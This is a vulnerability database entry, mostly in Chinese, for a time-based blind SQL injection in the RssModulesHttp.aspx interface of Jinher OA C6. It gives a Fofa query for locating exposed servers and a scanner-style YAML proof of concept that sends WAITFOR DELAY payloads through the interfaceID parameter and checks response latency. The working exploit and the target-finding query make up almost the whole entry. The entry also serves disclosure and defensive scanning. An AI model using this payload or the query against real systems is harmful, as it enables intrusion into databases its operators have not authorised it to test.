jinher-c6-rssmoduleshttp-sqli: 金和OA RssModulesHttp.aspx接口SQL注入

日期: 2025-09-01 | 影响软件: 金和OA | POC: 已公开

漏洞描述

Fofa: app="金和网络-金和OA" && body="/c6/"

PoC代码[已公开]

id: jinher-c6-rssmoduleshttp-sqli

info:
  name: 金和OA RssModulesHttp.aspx接口SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="金和网络-金和OA" && body="/c6/"
  reference:
    - https://mp.weixin.qq.com/s/RM0gZfnSs4hsGa6MerqDog
  tags: jinher,sqli
  created: 2024/02/21

rules:
  r0:
    request:
      method: GET
      path: /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:10%27--
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r1:
    request:
      method: GET
      path: /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:6%27--
    expression: response.status == 200 && response.latency <= 8000 &&  response.latency >= 6000
  r2:
    request:
      method: GET
      path: /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:10%27--
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r3:
    request:
      method: GET
      path: /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:6%27--
    expression: response.status == 200 && response.latency <= 8000 &&  response.latency >= 6000
extractors:
  - type: word
    extractor:
      latency1: "6s"
      latency2: "10s"
expression: r0() && r1() && r2() && r3()

相关漏洞推荐